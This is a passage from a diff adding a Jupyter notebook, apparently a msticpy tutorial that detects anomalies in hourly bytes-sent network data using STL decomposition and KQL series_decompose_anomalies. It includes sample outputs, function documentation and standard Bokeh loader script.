+       "      <th>TotalBytesSent</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>2019-05-01T06:00:00Z</th>\n",
+       "      <td>873713587</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2019-05-01T07:00:00Z</th>\n",
+       "      <td>882187669</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2019-05-01T08:00:00Z</th>\n",
+       "      <td>852506841</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2019-05-01T09:00:00Z</th>\n",
+       "      <td>898793650</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2019-05-01T10:00:00Z</th>\n",
+       "      <td>891598085</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                      TotalBytesSent\n",
+       "TimeGenerated                       \n",
+       "2019-05-01T06:00:00Z       873713587\n",
+       "2019-05-01T07:00:00Z       882187669\n",
+       "2019-05-01T08:00:00Z       852506841\n",
+       "2019-05-01T09:00:00Z       898793650\n",
+       "2019-05-01T10:00:00Z       891598085"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Read Time series data with date as index and other column\n",
+    "stldemo = pd.read_csv(\n",
+    "    \"data/TimeSeriesDemo.csv\", index_col=[\"TimeGenerated\"], usecols=[\"TimeGenerated\",\"TotalBytesSent\"])\n",
+    "stldemo.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Discover anomalies using timeseries_anomalies_stl function\n",
+    "We will run msticpy function `timeseries_anomalies_stl` on the input data to discover anomalies."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:29.428779Z",
+     "start_time": "2020-06-09T16:46:29.346098Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>TotalBytesSent</th>\n",
+       "      <th>residual</th>\n",
+       "      <th>trend</th>\n",
+       "      <th>seasonal</th>\n",
+       "      <th>weights</th>\n",
+       "      <th>baseline</th>\n",
+       "      <th>score</th>\n",
+       "      <th>anomalies</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2019-05-01T06:00:00Z</td>\n",
+       "      <td>873713587</td>\n",
+       "      <td>-7258970</td>\n",
+       "      <td>786685528</td>\n",
+       "      <td>94287029</td>\n",
+       "      <td>1</td>\n",
+       "      <td>880972557</td>\n",
+       "      <td>-0.097114</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2019-05-01T07:00:00Z</td>\n",
+       "      <td>882187669</td>\n",
+       "      <td>2291183</td>\n",
+       "      <td>789268398</td>\n",
+       "      <td>90628087</td>\n",
+       "      <td>1</td>\n",
+       "      <td>879896485</td>\n",
+       "      <td>0.029661</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2019-05-01T08:00:00Z</td>\n",
+       "      <td>852506841</td>\n",
+       "      <td>-2875384</td>\n",
+       "      <td>791851068</td>\n",
+       "      <td>63531157</td>\n",
+       "      <td>1</td>\n",
+       "      <td>855382225</td>\n",
+       "      <td>-0.038923</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2019-05-01T09:00:00Z</td>\n",
+       "      <td>898793650</td>\n",
+       "      <td>17934415</td>\n",
+       "      <td>794432848</td>\n",
+       "      <td>86426386</td>\n",
+       "      <td>1</td>\n",
+       "      <td>880859234</td>\n",
+       "      <td>0.237320</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2019-05-01T10:00:00Z</td>\n",
+       "      <td>891598085</td>\n",
+       "      <td>8677706</td>\n",
+       "      <td>797012590</td>\n",
+       "      <td>85907788</td>\n",
+       "      <td>1</td>\n",
+       "      <td>882920378</td>\n",
+       "      <td>0.114440</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "          TimeGenerated  TotalBytesSent  residual      trend  seasonal  \\\n",
+       "0  2019-05-01T06:00:00Z       873713587  -7258970  786685528  94287029   \n",
+       "1  2019-05-01T07:00:00Z       882187669   2291183  789268398  90628087   \n",
+       "2  2019-05-01T08:00:00Z       852506841  -2875384  791851068  63531157   \n",
+       "3  2019-05-01T09:00:00Z       898793650  17934415  794432848  86426386   \n",
+       "4  2019-05-01T10:00:00Z       891598085   8677706  797012590  85907788   \n",
+       "\n",
+       "   weights   baseline     score  anomalies  \n",
+       "0        1  880972557 -0.097114          0  \n",
+       "1        1  879896485  0.029661          0  \n",
+       "2        1  855382225 -0.038923          0  \n",
+       "3        1  880859234  0.237320          0  \n",
+       "4        1  882920378  0.114440          0  "
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "output = timeseries_anomalies_stl(stldemo)\n",
+    "output.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Displaying Anomalies using STL\n",
+    "We will filter only the anomalies (with value 1 from anomalies column) of the output dataframe retrieved after running the msticpy function `timeseries_anomalies_stl`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:31.310294Z",
+     "start_time": "2020-06-09T16:46:31.276153Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>TotalBytesSent</th>\n",
+       "      <th>residual</th>\n",
+       "      <th>trend</th>\n",
+       "      <th>seasonal</th>\n",
+       "      <th>weights</th>\n",
+       "      <th>baseline</th>\n",
+       "      <th>score</th>\n",
+       "      <th>anomalies</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>299</th>\n",
+       "      <td>2019-05-13T17:00:00Z</td>\n",
+       "      <td>916767394</td>\n",
+       "      <td>288355070</td>\n",
+       "      <td>523626111</td>\n",
+       "      <td>104786212</td>\n",
+       "      <td>1</td>\n",
+       "      <td>628412323</td>\n",
+       "      <td>3.827062</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>399</th>\n",
+       "      <td>2019-05-17T21:00:00Z</td>\n",
+       "      <td>1555286702</td>\n",
+       "      <td>296390627</td>\n",
+       "      <td>1132354860</td>\n",
+       "      <td>126541214</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1258896074</td>\n",
+       "      <td>3.933731</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>599</th>\n",
+       "      <td>2019-05-26T05:00:00Z</td>\n",
+       "      <td>1768911488</td>\n",
+       "      <td>347810809</td>\n",
+       "      <td>1300005332</td>\n",
+       "      <td>121095345</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1421100678</td>\n",
+       "      <td>4.616317</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            TimeGenerated  TotalBytesSent   residual       trend   seasonal  \\\n",
+       "299  2019-05-13T17:00:00Z       916767394  288355070   523626111  104786212   \n",
+       "399  2019-05-17T21:00:00Z      1555286702  296390627  1132354860  126541214   \n",
+       "599  2019-05-26T05:00:00Z      1768911488  347810809  1300005332  121095345   \n",
+       "\n",
+       "     weights    baseline     score  anomalies  \n",
+       "299        1   628412323  3.827062          1  \n",
+       "399        1  1258896074  3.933731          1  \n",
+       "599        1  1421100678  4.616317          1  "
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "output[output['anomalies']==1]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Read From External Sources\n",
+    "If you have time series data in other locations, you can read it via pandas or respective data store API where data is stored. The pandas I/O API is a set of top level reader functions accessed like pandas.read_csv() that generally return a pandas object.\n",
+    "\n",
+    "Read More at Pandas Documentation:\n",
+    "- [I/O Tools (Text ,CSV,HDF5..)](https://pandas.pydata.org/pandas-docs/stable/user_guide/io.html)\n",
+    "\n",
+    "Example of using Pandas `read_csv` to read local csv file containing TimeSeries demo dataset. Additional columns in the csv such as `baseline`, `score` and `anoamlies` are generated using built-in KQL Time series functions such as `series_decompose_anomalies()`."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:33.369019Z",
+     "start_time": "2020-06-09T16:46:33.326428Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>TotalBytesSent</th>\n",
+       "      <th>baseline</th>\n",
+       "      <th>score</th>\n",
+       "      <th>anomalies</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2019-05-01 06:00:00</td>\n",
+       "      <td>873713587</td>\n",
+       "      <td>782728212</td>\n",
+       "      <td>0.224776</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2019-05-01 07:00:00</td>\n",
+       "      <td>882187669</td>\n",
+       "      <td>838492449</td>\n",
+       "      <td>0.000000</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2019-05-01 08:00:00</td>\n",
+       "      <td>852506841</td>\n",
+       "      <td>816772273</td>\n",
+       "      <td>0.000000</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2019-05-01 09:00:00</td>\n",
+       "      <td>898793650</td>\n",
+       "      <td>878871426</td>\n",
+       "      <td>0.000000</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2019-05-01 10:00:00</td>\n",
+       "      <td>891598085</td>\n",
+       "      <td>862639955</td>\n",
+       "      <td>0.000000</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "        TimeGenerated  TotalBytesSent   baseline     score  anomalies\n",
+       "0 2019-05-01 06:00:00       873713587  782728212  0.224776          0\n",
+       "1 2019-05-01 07:00:00       882187669  838492449  0.000000          0\n",
+       "2 2019-05-01 08:00:00       852506841  816772273  0.000000          0\n",
+       "3 2019-05-01 09:00:00       898793650  878871426  0.000000          0\n",
+       "4 2019-05-01 10:00:00       891598085  862639955  0.000000          0"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "timeseriesdemo = pd.read_csv(\n",
+    "    \"data/TimeSeriesDemo.csv\", parse_dates=[\"TimeGenerated\"], infer_datetime_format=True\n",
+    ")\n",
+    "\n",
+    "#show sample records\n",
+    "timeseriesdemo.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Displaying Anomalies Separately\n",
+    "We will filter only the anomalies shown in the above plot and display below along with associated aggreageted hourly timewindow. You can later query for the time windows scope for additional alerts triggered or any other suspicious activity from other datasources."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:35.343635Z",
+     "start_time": "2020-06-09T16:46:35.309202Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>index</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>TotalBytesSent</th>\n",
+       "      <th>baseline</th>\n",
+       "      <th>score</th>\n",
+       "      <th>anomalies</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>299</td>\n",
+       "      <td>2019-05-13 17:00:00</td>\n",
+       "      <td>916767394</td>\n",
+       "      <td>662107538</td>\n",
+       "      <td>3.247957</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>399</td>\n",
+       "      <td>2019-05-17 21:00:00</td>\n",
+       "      <td>1555286702</td>\n",
+       "      <td>1212399509</td>\n",
+       "      <td>4.877577</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>599</td>\n",
+       "      <td>2019-05-26 05:00:00</td>\n",
+       "      <td>1768911488</td>\n",
+       "      <td>1391114419</td>\n",
+       "      <td>5.522387</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   index       TimeGenerated  TotalBytesSent    baseline     score  anomalies\n",
+       "0    299 2019-05-13 17:00:00       916767394   662107538  3.247957          1\n",
+       "1    399 2019-05-17 21:00:00      1555286702  1212399509  4.877577          1\n",
+       "2    599 2019-05-26 05:00:00      1768911488  1391114419  5.522387          1"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "#Filtering anomales column for 1 and displaying records\n",
+    "timeseriesdemo[timeseriesdemo['anomalies'] == 1].reset_index()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Displaying Time Series anomaly alerts\n",
+    "\n",
+    "You can also use `series_decompose_anomalies()` which will run Anomaly Detection based on series decomposition. This takes an expression containing a series (dynamic numerical array) as input and extract anomalous points with scores.\n",
+    "\n",
+    "***KQL Reference Documentation:***\n",
+    "- [series_decompose_anomalies](https://docs.microsoft.com/azure/kusto/query/series-decompose-anomaliesfunction)\n",
+    "\n",
+    "You can use available query `qry_prov.MultiDataSource.get_timeseries_alerts()` to get the similar details\n",
+    "```\n",
+    "Query:  get_timeseries_anomalies\n",
+    "Data source:  LogAnalytics\n",
+    "Time Series anomalies detected using built-in KQL time series function-series_decompose_anomalies\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "add_query_items: str (optional)\n",
+    "    Additional query clauses\n",
+    "aggregatecolumn: str (optional)\n",
+    "    field to agregate from source dataset\n",
+    "    (default value is: Total)\n",
+    "aggregatefunction: str (optional)\n",
+    "    Aggregation functions to use - count(), sum(), avg() etc\n",
+    "    (default value is: count())\n",
+    "end: datetime\n",
+    "    Query end time\n",
+    "groupbycolumn: str (optional)\n",
+    "    Group by field to aggregate results\n",
+    "    (default value is: Type)\n",
+    "scorethreshold: str (optional)\n",
+    "    Score threshold for alerting\n",
+    "    (default value is: 3)\n",
+    "start: datetime\n",
+    "    Query start time\n",
+    "table: str\n",
+    "    Table name\n",
+    "timeframe: str (optional)\n",
+    "    Aggregation TimeFrame\n",
+    "    (default value is: 1h)\n",
+    "timestampcolumn: str (optional)\n",
+    "    Timestamp field to use from source dataset\n",
+    "    (default value is: TimeGenerated)\n",
+    "where_clause: str (optional)\n",
+    "    Optional additional filter clauses\n",
+    "Query:\n",
+    " {table} {where_clause} | project {timestampcolumn},{aggregatecolumn},{groupbycolumn} | where {timestampcolumn} >= datetime({start}) | where {timestampcolumn} <= datetime({end}) | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn} | extend (anomalies, score, baseline) = series_decompose_anomalies({aggregatecolumn}, {scorethreshold},-1,\"linefit\") | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime), anomalies to typeof(double), score to typeof(double), baseline to typeof(long) | extend score = round(score,2) {add_query_items}\n",
+    "```\n",
+    "\n",
+    "***Sample python code leveraging KQL query will look like this***\n",
+    "\n",
+    "```python\n",
+    "\n",
+    "# Specify start and end timestamps\n",
+    "start = \"2020-02-09 00:00:00.000000\"\n",
+    "end = \"2020-03-10 00:00:00.000000\"\n",
+    "\n",
+    "# Execute the query by passing required and optional parameters. you can also add add_query_items='|where anomalies>0' to filter and show only anomalies, else it will show all records.\n",
+    "time_series_anomalies = qry_prov.MultiDataSource.get_timeseries_anomalies(\n",
+    "    start=start,\n",
+    "    end=end,\n",
+    "    table=\"CommonSecurityLog\",\n",
+    "    timestampcolumn=\"TimeGenerated\",\n",
+    "    aggregatecolumn=\"SentBytes\",\n",
+    "    groupbycolumn=\"DeviceVendor\",\n",
+    "    aggregatefunction=\"sum(SentBytes)\",\n",
+    "    where_clause='|where DeviceVendor==\"Palo Alto Networks\"',\n",
+    "    scorethreshold='1.5',\n",
+    "    )\n",
+    "\n",
+    "#display output\n",
+    "time_series_anomalies\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Time Series Anomalies Visualization\n",
+    "Time series anomalies once discovered, you can visualize with line chart type to display outliers.\n",
+    "Below we will see 2 types to visualize, using msticpy function `display_timeseries_anomalies()` via Bokeh library as well as using built-in KQL `render` operator."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using Bokeh Visualization Library"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-03-12T07:44:03.559172Z",
+     "start_time": "2020-03-12T07:44:03.545051Z"
+    }
+   },
+   "source": [
+    "## Documentation for display_timeseries_anomalies\n",
+    "```\n",
+    "display_timeseries_anomolies(\n",
+    "    data: pandas.core.frame.DataFrame,\n",
+    "    y: str = 'Total',\n",
+    "    time_column: str = 'TimeGenerated',\n",
+    "    anomalies_column: str = 'anomalies',\n",
+    "    source_columns: list = None,\n",
+    "    period: int = 30,\n",
+    "    **kwargs,\n",
+    ") -> <function figure at 0x7f0de9ae2598>\n",
+    "Docstring:\n",
+    "Display time series anomalies visualization\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "data : pd.DataFrame\n",
+    "    DataFrame as a time series data set retreived from KQL time series functions\n",
+    "    dataframe will have columns as TimeGenerated, y, baseline, score, anomalies\n",
+    "\n",
+    "Other Parameters\n",
+    "----------------\n",
+    "y : str, optional\n",
+    "    Name of column holding numeric values to plot against time series to determine anomolies\n",
+    "    (the default is 'Total')\n",
+    "time_column : str, optional\n",
+    "    Name of the timestamp column\n",
+    "    (the default is 'TimeGenerated')\n",
+    "anomolies_column : str, optional\n",
+    "    Name of the column holding binary status(1/0) for anomaly/benign\n",
+    "    (the default is 'anomolies')\n",
+    "ref_time : datetime, optional\n",
+    "    Input reference line to display (the default is None)\n",
+    "title : str, optional\n",
+    "    Title to display (the default is None)\n",
+    "legend: str, optional\n",
+    "    Where to position the legend\n",
+    "    None, left, right or inline (default is None)\n",
+    "yaxis : bool, optional\n",
+    "    Whether to show the yaxis and labels\n",
+    "range_tool : bool, optional\n",
+    "    Show the the range slider tool (default is True)\n",
+    "source_columns : list, optional\n",
+    "    List of default source columns to use in tooltips\n",
+    "    (the default is None)\n",
+    "height : int, optional\n",
+    "    The height of the plot figure\n",
+    "    (the default is auto-calculated height)\n",
+    "width : int, optional\n",
+    "    The width of the plot figure (the default is 900)\n",
+    "xgrid : bool, optional\n",
+    "        Whether to show the xaxis grid (default is True)\n",
+    "ygrid : bool, optional\n",
+    "        Whether to show the yaxis grid (default is False)\n",
+    "color : list, optional\n",
+    "        List of colors to use in 3 plots as specified in order \n",
+    "        3 plots- line(observed), circle(baseline), circle_x/user specified(anomalies).\n",
+    "        (the default is [\"navy\", \"green\", \"firebrick\"])\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "figure\n",
+    "    The bokeh plot figure.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:40.785086Z",
+     "start_time": "2020-06-09T16:46:40.628060Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1001\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
